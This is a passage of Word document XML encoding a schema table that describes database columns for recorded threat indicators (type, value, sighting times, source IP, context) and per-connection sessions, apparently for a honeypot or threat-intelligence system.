              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGSERIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential identifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">type, value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UNIQUE (type, value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">url, domain, ipv4 or sha256 and the indicator itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">first_seen, last_seen, hits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ, INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sighting window and count.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">source_ip, session_id, protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT, UUID, TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Where the indicator was observed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Command line or reason for the indicator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">session_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Generated for every TCP connection on any protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
